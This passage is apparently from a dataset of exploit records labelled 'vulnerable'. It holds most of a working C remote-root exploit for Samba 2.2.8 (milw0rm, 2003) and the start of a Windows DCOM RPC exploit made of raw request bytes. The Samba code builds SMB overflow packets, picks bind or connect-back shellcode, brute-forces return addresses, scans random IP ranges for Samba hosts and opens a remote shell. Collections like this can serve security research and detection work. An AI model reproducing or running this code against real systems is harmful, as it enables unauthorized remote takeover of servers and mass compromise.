1;\n\n\n\n for (i = 0; i < 100; i++)\n\n if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);\n\n\n\n if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n close(sock);\n\n exit(1);\n\n }\n\n\n\n if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {\n\n fprintf(stdout, \"+ Worked!\\n\"\n\n \"--------------------------------------------------------------\\n\");\n\n shell(sock);\n\n close(sock);\n\n }\n\n\n\n\n\n}\n\n\n\nint start_session(int sock)\n\n{\n\n char buffer[1000];\n\n char response[4096];\n\n char session_data1[] = \"\\x00\\xff\\x00\\x00\\x00\\x00\\x20\\x02\\x00\\x01\\x00\\x00\\x00\\x00\";\n\n char session_data2[] = \"\\x00\\x00\\x00\\x00\\x5c\\x5c\\x69\\x70\\x63\\x24\\x25\\x6e\\x6f\\x62\\x6f\\x64\\x79\"\n\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x49\\x50\\x43\\x24\";\n\n\n\n NETBIOS_HEADER *netbiosheader;\n\n SMB_HEADER *smbheader;\n\n\n\n memset(buffer, 0x00, sizeof(buffer));\n\n\n\n netbiosheader = (NETBIOS_HEADER *)buffer;\n\n smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n netbiosheader->type = 0x00; /* session message */\n\n netbiosheader->flags = 0x00;\n\n netbiosheader->length = htons(0x2E);\n\n\n\n smbheader->protocol[0] = 0xFF;\n\n smbheader->protocol[1] = 'S';\n\n smbheader->protocol[2] = 'M';\n\n smbheader->protocol[3] = 'B';\n\n smbheader->command = 0x73; /* session setup */\n\n smbheader->flags = 0x08; /* caseless pathnames */\n\n smbheader->flags2 = 0x01; /* long filenames supported */\n\n smbheader->pid = getpid() & 0xFFFF;\n\n smbheader->uid = 100;\n\n smbheader->mid = 0x01;\n\n\n\n memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);\n\n\n\n if(write_timer(sock, 3) == 1)\n\n if (send(sock, buffer, 50, 0) < 0) return -1;\n\n\n\n memset(response, 0x00, sizeof(response));\n\n\n\n if (read_timer(sock, 3) == 1)\n\n if (read(sock, response, sizeof(response) - 1) < 0) return -1;\n\n\n\n netbiosheader = (NETBIOS_HEADER *)response;\n\n smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));\n\n\n\n if (netbiosheader->type != 0x00) fprintf(stderr, \"+ Recieved a non session message\\n\");\n\n\n\n netbiosheader = (NETBIOS_HEADER *)buffer;\n\n smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n memset(buffer, 0x00, sizeof(buffer));\n\n\n\n netbiosheader->type = 0x00; /* session message */\n\n netbiosheader->flags = 0x00;\n\n netbiosheader->length = htons(0x3C);\n\n\n\n smbheader->protocol[0] = 0xFF;\n\n smbheader->protocol[1] = 'S';\n\n smbheader->protocol[2] = 'M';\n\n smbheader->protocol[3] = 'B';\n\n smbheader->command = 0x70; /* start connection */\n\n smbheader->pid = getpid() & 0xFFFF;\n\n smbheader->tid = 0x00;\n\n smbheader->uid = 100;\n\n\n\n memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);\n\n\n\n if(write_timer(sock, 3) == 1)\n\n if (send(sock, buffer, 64, 0) < 0) return -1;\n\n\n\n memset(response, 0x00, sizeof(response));\n\n\n\n if (read_timer(sock, 3) == 1)\n\n if (read(sock, response, sizeof(response) - 1) < 0) return -1;\n\n\n\n netbiosheader = (NETBIOS_HEADER *)response;\n\n smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));\n\n\n\n if (netbiosheader->type != 0x00) return -1;\n\n\n\n return 0;\n\n}\n\n\n\nint exploit_normal(int sock, unsigned long ret, char *shellcode)\n\n{\n\n\n\n char buffer[4000];\n\n char exploit_data[] =\n\n \"\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\x00\\x00\\x90\";\n\n\n\n int i = 0;\n\n unsigned long dummy = ret - 0x90;\n\n\n\n NETBIOS_HEADER *netbiosheader;\n\n SMB_HEADER *smbheader;\n\n\n\n memset(buffer, 0x00, sizeof(buffer));\n\n\n\n netbiosheader = (NETBIOS_HEADER *)buffer;\n\n smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n netbiosheader->type = 0x00; /* session message */\n\n netbiosheader->flags = 0x04;\n\n netbiosheader->length = htons(2096);\n\n\n\n smbheader->protocol[0] = 0xFF;\n\n smbheader->protocol[1] = 'S';\n\n smbheader->protocol[2] = 'M';\n\n smbheader->protocol[3] = 'B';\n\n smbheader->command = 0x32; /* SMBtrans2 */\n\n smbheader->tid = 0x01;\n\n smbheader->uid = 100;\n\n\n\n memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);\n\n\n\n buffer[1096] = 0xEB;\n\n buffer[1097] = 0x70;\n\n\n\n for (i = 0; i < 4 * 24; i += 8) {\n\n memcpy(buffer + 1099 + i, &dummy, 4);\n\n memcpy(buffer + 1103 + i, &ret, 4);\n\n }\n\n\n\n memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), \n\n exploit_data, sizeof(exploit_data) - 1);\n\n memcpy(buffer + 1800, shellcode, strlen(shellcode));\n\n\n\n if(write_timer(sock, 3) == 1) {\n\n if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;\n\n return 0;\n\n }\n\n\n\n return -1;\n\n}\n\n\n\nint exploit_openbsd32(int sock, unsigned long ret, char *shellcode)\n\n{\n\n char buffer[4000];\n\n\n\n char exploit_data[] =\n\n \"\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\x00\\x00\\x90\";\n\n\n\n int i = 0;\n\n unsigned long dummy = ret - 0x30;\n\n NETBIOS_HEADER *netbiosheader;\n\n SMB_HEADER *smbheader;\n\n\n\n memset(buffer, 0x00, sizeof(buffer));\n\n\n\n netbiosheader = (NETBIOS_HEADER *)buffer;\n\n smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n netbiosheader->type = 0x00; /* session message */\n\n netbiosheader->flags = 0x04;\n\n netbiosheader->length = htons(2096);\n\n\n\n smbheader->protocol[0] = 0xFF;\n\n smbheader->protocol[1] = 'S';\n\n smbheader->protocol[2] = 'M';\n\n smbheader->protocol[3] = 'B';\n\n smbheader->command = 0x32; /* SMBtrans2 */\n\n smbheader->tid = 0x01;\n\n smbheader->uid = 100;\n\n\n\n memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);\n\n\n\n for (i = 0; i < 4 * 24; i += 4)\n\n memcpy(buffer + 1131 + i, &dummy, 4);\n\n\n\n memcpy(buffer + 1127, &ret, 4);\n\n\n\n memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),\n\n exploit_data, sizeof(exploit_data) - 1);\n\n\n\n memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));\n\n\n\n if(write_timer(sock, 3) == 1) {\n\n if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;\n\n return 0;\n\n }\n\n\n\n return -1;\n\n}\n\n\n\n\n\nint main (int argc,char *argv[])\n\n{\n\n char *shellcode = NULL;\n\n char scan_ip[256];\n\n\n\n int brute = -1;\n\n int connectback = 0;\n\n int force = 0;\n\n int i = 0;\n\n int ip1 = 0;\n\n int ip2 = 0;\n\n int ip3 = 0;\n\n int ip4 = 0;\n\n int opt = 0;\n\n int port = 139;\n\n int random = 0;\n\n int scan = 0;\n\n int sock = 0;\n\n int sock2 = 0;\n\n int status = 0;\n\n int type = 0;\n\n int verbose = 0;\n\n\n\n unsigned long BRUTE_DELAY = 100000;\n\n unsigned long ret = 0x0;\n\n unsigned long MAX_CHILDS = 40;\n\n unsigned long STEPS = 300;\n\n\n\n struct hostent *he;\n\n\n\n fprintf(stdout, \"samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\\n\"\n\n \"--------------------------------------------------------------\\n\");\n\n \n\n while((opt = getopt(argc,argv,\"b:B:c:C:d:fp:r:sS:t:v\")) !=EOF) {\n\n switch(opt) \n\n {\n\n case 'b':\n\n brute = atoi(optarg);\n\n if ((brute < 0) || (brute > 3)) {\n\n fprintf(stderr, \"Invalid platform.\\n\\n\");\n\n return -1;\n\n }\n\n break;\n\n case 'B':\n\n STEPS = atoi(optarg);\n\n if (STEPS == 0) STEPS++;\n\n break;\n\n case 'c':\n\n sscanf(optarg, \"%d.%d.%d.%d\", &ip1, &ip2, &ip3, &ip4);\n\n connectback = 1;\n\n\n\n if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {\n\n fprintf(stderr, \"Invalid IP address.\\n\\n\");\n\n return -1;\n\n }\n\n\n\n linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;\n\n linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;\n\n linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;\n\n linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;\n\n\n\n break;\n\n case 'C':\n\n MAX_CHILDS = atoi(optarg);\n\n if (MAX_CHILDS == 0) {\n\n fprintf(stderr, \"Invalid number of childs.\\n\");\n\n return -1;\n\n }\n\n\n\n if (MAX_CHILDS > 99) {\n\n fprintf(stderr, \"Too many childs, using 99. \\n\");\n\n MAX_CHILDS = 99;\n\n }\n\n\n\n break;\n\n case 'd':\n\n BRUTE_DELAY = atoi(optarg);\n\n break;\n\n case 'f':\n\n force = 1;\n\n break;\n\n case 'p':\n\n port = atoi(optarg);\n\n if ((port <= 0) || (port > 65535)) {\n\n fprintf(stderr, \"Invalid port.\\n\\n\");\n\n return -1;\n\n }\n\n break;\n\n case 'r':\n\n ret = strtoul(optarg, &optarg, 16);\n\n break;\n\n case 's':\n\n random = 1;\n\n scan = 1;\n\n break;\n\n case 'S':\n\n random = 0;\n\n scan = 1;\n\n sscanf(optarg, \"%d.%d.%d\", &ip1, &ip2, &ip3);\n\n ip3--;\n\n break;\n\n case 't':\n\n type = atoi(optarg);\n\n if (type == 0 || type > sizeof(targets) / 16) {\n\n for(i = 0; i < sizeof(targets) / 16; i++)\n\n fprintf(stdout, \"%02d. %s [0x%08x]\\n\", i + 1, targets[i].type, (unsigned int) targets[i].ret);\n\n fprintf(stderr, \"\\n\");\n\n return -1;\n\n }\n\n break;\n\n case 'v':\n\n verbose = 1;\n\n break;\n\n default:\n\n usage(argv[0] == NULL ? \"sambal\" : argv[0]);\n\n break;\n\n }\n\n\n\n }\n\n\n\n if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) \n\n usage(argv[0] == NULL ? \"sambal\" : argv[0]);\n\n\n\n if (scan == 1) \n\n fprintf(stdout, \"+ Scan mode.\\n\");\n\n if (verbose == 1)\n\n fprintf(stdout, \"+ Verbose mode.\\n\");\n\n\n\n if (scan == 1) {\n\n\n\n srand(getpid());\n\n\n\n while (1) {\n\n\n\n if (random == 1) {\n\n ip1 = rand() % 255;\n\n ip2 = rand() % 255;\n\n ip3 = rand() % 255; } \n\n else {\n\n ip3++;\n\n if (ip3 > 254) { ip3 = 1; ip2++; }\n\n if (ip2 > 254) { ip2 = 1; ip1++; }\n\n if (ip1 > 254) exit(0);\n\n }\n\n\n\n for (ip4 = 0; ip4 < 255; ip4++) {\n\n i++;\n\n snprintf(scan_ip, sizeof(scan_ip) - 1, \"%u.%u.%u.%u\", ip1, ip2, ip3, ip4);\n\n usleep(BRUTE_DELAY);\n\n\n\n switch (fork()) {\n\n case 0:\n\n switch(is_samba(scan_ip, 2)) {\n\n case 0:\n\n fprintf(stdout, \"+ [%s] Samba\\n\", scan_ip);\n\n break;\n\n case 1:\n\n fprintf(stdout, \"+ [%s] Windows\\n\", scan_ip);\n\n break;\n\n default:\n\n break; \n\n }\n\n\n\n exit(0);\n\n break;\n\n case -1:\n\n fprintf(stderr, \"+ fork() error\\n\");\n\n exit(-1);\n\n break;\n\n default:\n\n if (i > MAX_CHILDS - 2) { \n\n wait(&status); \n\n i--;\n\n }\n\n break;\n\n }\n\n }\n\n\n\n }\n\n\n\n return 0;\n\n }\n\n\n\n\n\n he = gethostbyname(argv[optind]);\n\n\n\n if (he == NULL) {\n\n fprintf(stderr, \"Unable to resolve %s...\\n\", argv[optind]);\n\n return -1;\n\n }\n\n\n\n if (brute == -1) {\n\n\n\n if (ret == 0) ret = targets[type - 1].ret;\n\n\n\n shellcode = targets[type - 1].shellcode;\n\n\n\n if (connectback == 1) {\n\n fprintf(stdout, \"+ connecting back to: [%d.%d.%d.%d:45295]\\n\", \n\n ip1, ip2, ip3, ip4);\n\n\n\n switch(targets[type - 1].os_type) {\n\n case 0: /* linux */\n\n shellcode = linux_connect_back;\n\n break;\n\n case 1: /* FreeBSD/NetBSD */\n\n shellcode = bsd_connect_back;\n\n break;\n\n case 2: /* OpenBSD */\n\n shellcode = bsd_connect_back;\n\n break;\n\n case 3: /* OpenBSD 3.2 Non-exec stack */\n\n shellcode = bsd_connect_back;\n\n break;\n\n }\n\n\n\n }\n\n\n\n if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n fprintf(stderr, \"+ socket() error.\\n\");\n\n return -1;\n\n }\n\n\n\n if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n fprintf(stderr, \"+ socket() error.\\n\");\n\n return -1;\n\n }\n\n\n\n memcpy(&addr1.sin_addr, he->h_addr, he->h_length);\n\n memcpy(&addr2.sin_addr, he->h_addr, he->h_length);\n\n\n\n addr1.sin_family = AF_INET;\n\n addr1.sin_port = htons(port); \n\n addr2.sin_family = AF_INET;\n\n addr2.sin_port = htons(45295);\n\n\n\n if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { \n\n fprintf(stderr, \"+ connect() error.\\n\");\n\n return -1;\n\n }\n\n\n\n if (verbose == 1) fprintf(stdout, \"+ %s\\n\", targets[type - 1].type);\n\n\n\n if (force == 0) {\n\n\n\n if (is_samba(argv[optind], 2) != 0) {\n\n fprintf(stderr, \"+ Host is not running samba!\\n\\n\");\n\n return -1;\n\n }\n\n\n\n fprintf(stderr, \"+ Host is running samba.\\n\");\n\n }\n\n\n\n if (verbose == 1) fprintf(stdout, \"+ Connected to [%s:%d]\\n\", (char *)inet_ntoa(addr1.sin_addr), port);\n\n\n\n if (start_session(sock) < 0) fprintf(stderr, \"+ Session failed.\\n\");\n\n\n\n if (verbose == 1) fprintf(stdout, \"+ Session enstablished\\n\");\n\n sleep(5);\n\n if (targets[type - 1].os_type != 2) {\n\n if (exploit_normal(sock, ret, shellcode) < 0) {\n\n fprintf(stderr, \"+ Failed.\\n\");\n\n close(sock);\n\n }\n\n } else {\n\n if (exploit_openbsd32(sock, ret, shellcode) < 0) {\n\n fprintf(stderr, \"+ Failed.\\n\");\n\n close(sock);\n\n }\n\n }\n\n\n\n sleep(2);\n\n\n\n if (connectback == 0) {\n\n if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {\n\n fprintf(stderr, \"+ Exploit failed, try -b to bruteforce.\\n\");\n\n\n\n return -1;\n\n }\n\n\n\n fprintf(stdout, \"--------------------------------------------------------------\\n\");\n\n\n\n shell(sock2);\n\n close(sock);\n\n close(sock2);\n\n } else {\n\n fprintf(stdout, \"+ Done...\\n\");\n\n close(sock2);\n\n close(sock);\n\n }\n\n return 0;\n\n }\n\n\n\n signal(SIGPIPE, SIG_IGN);\n\n signal(SIGUSR1, handler);\n\n\n\n switch(brute) {\n\n case 0:\n\n if (ret == 0) ret = 0xc0000000;\n\n shellcode = linux_bindcode;\n\n fprintf(stdout, \"+ Bruteforce mode. (Linux)\\n\");\n\n break;\n\n case 1:\n\n if (ret == 0) ret = 0xbfc00000;\n\n shellcode = bsd_bindcode;\n\n fprintf(stdout, \"+ Bruteforce mode. (FreeBSD / NetBSD)\\n\");\n\n break;\n\n case 2:\n\n if (ret == 0) ret = 0xdfc00000;\n\n shellcode = bsd_bindcode;\n\n fprintf(stdout, \"+ Bruteforce mode. (OpenBSD 3.1 and prior)\\n\");\n\n break;\n\n case 3:\n\n if (ret == 0) ret = 0x00170000;\n\n shellcode = bsd_bindcode;\n\n fprintf(stdout, \"+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\\n\");\n\n break;\n\n }\n\n\n\n memcpy(&addr1.sin_addr, he->h_addr, he->h_length);\n\n memcpy(&addr2.sin_addr, he->h_addr, he->h_length);\n\n\n\n addr1.sin_family = AF_INET;\n\n addr1.sin_port = htons(port);\n\n addr2.sin_family = AF_INET;\n\n addr2.sin_port = htons(45295);\n\n\n\n for (i = 0; i < 100; i++)\n\n childs[i] = -1;\n\n i = 0;\n\n\n\n if (force == 0) {\n\n if (is_samba(argv[optind], 2) != 0) {\n\n fprintf(stderr, \"+ Host is not running samba!\\n\\n\");\n\n return -1;\n\n }\n\n\n\n fprintf(stderr, \"+ Host is running samba.\\n\");\n\n }\n\n\n\n while (OWNED == 0) {\n\n\n\n if (sock > 2) close(sock);\n\n if (sock2 > 2) close(sock2);\n\n\n\n if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n if (verbose == 1) fprintf(stderr, \"+ socket() error.\\n\");\n\n }\n\n else { \n\n ret -= STEPS;\n\n i++;\n\n }\n\n\n\n if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)\n\n if (verbose == 1) fprintf(stderr, \"+ socket() error.\\n\");\n\n\n\n\n\n if ((ret & 0xff) == 0x00 && brute != 3) ret++;\n\n\n\n if (verbose == 1) fprintf(stdout, \"+ Using ret: [0x%08x]\\n\", (unsigned int)ret);\n\n\n\n usleep(BRUTE_DELAY);\n\n\n\n switch (childs[i] = fork()) {\n\n case 0:\n\n if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {\n\n if (sock > 2) close(sock);\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n\n\n if(write_timer(sock, 3) == 1) {\n\n if (start_session(sock) < 0) {\n\n if (verbose == 1) fprintf(stderr, \"+ Session failed.\\n\");\n\n if (sock > 2)close(sock);\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n\n\n if (brute == 3) {\n\n if (exploit_openbsd32(sock, ret, shellcode) < 0) {\n\n if (verbose == 1) fprintf(stderr, \"+ Failed.\\n\");\n\n if (sock > 2) close(sock);\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n } \n\n else {\n\n if (exploit_normal(sock, ret, shellcode) < 0) {\n\n if (verbose == 1) fprintf(stderr, \"+ Failed.\\n\");\n\n if (sock > 2) close(sock);\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n\n\n if (sock > 2) close(sock);\n\n\n\n if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n\n\n if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {\n\n if (sock2 > 2) close(sock2);\n\n kill(getppid(), SIGUSR1);\n\n }\n\n\n\n exit(1);\n\n }\n\n\n\n\n\n exit(0);\n\n break;\n\n case -1:\n\n fprintf(stderr, \"+ fork() error\\n\");\n\n exit(-1);\n\n break;\n\n default:\n\n if (i > MAX_CHILDS - 2) {\n\n wait(&status);\n\n i--;\n\n }\n\n break;\n\n }\n\n\n\n }\n\n\n\n }\n\n\n\n return 0;\n\n}\n\n\n\n// milw0rm.com [2003-04-10]", + "vulnerable": true + }, + { + "exploit_id": 100, + "content": "#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n\n\n#pragma comment(lib,\"ws2_32\")\n\n\n\nunsigned char bindstr[]={\n\n0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,\n\n0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,\n\n0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,\n\n0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,\n\n0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};\n\n\n\nunsigned char request1[]={\n\n0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03\n\n,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00\n\n,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45\n\n,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E\n\n,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D\n\n,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41\n\n,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00\n\n,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45\n\n,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00\n\n,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29\n\n,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00\n\n,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00\n\n,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF\n\n,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09\n\n,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00\n\n,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00\n\n,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00\n\n,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00\n\n,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00\n\n,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E\n\n,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00\n\n,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00\n\n,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00\n\n,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00\n\n,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00};\n\n\n\nunsigned char request2[]={\n\n0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00\n\n,0x00,0x00,0x5C,0x00,0x5C,0x00};\n\n\n\nunsigned char 